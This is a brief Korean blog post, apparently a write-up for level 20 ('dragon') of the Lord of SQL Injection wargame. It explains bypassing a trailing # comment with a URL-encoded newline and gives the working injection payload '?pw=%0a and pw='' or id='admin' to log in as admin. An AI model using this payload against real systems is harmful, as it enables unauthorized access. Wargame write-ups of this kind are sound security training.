$ 웹 해킹 $/los.rubiya.kr
[Lord of SQL_injection] #20 dragon
ws1004
2019. 4. 6. 01:02
문제를 확인해보면 id의값을 admin으로 만들면 되지만 id뒤에 #인 주석이 들어가 있습니다.
그래도 다행인것은 #주석은 한줄 주석이기때문에 %0a인 \n 줄바꿈을 이용하면 됩니다.
?pw=%0a and pw='' or id='admin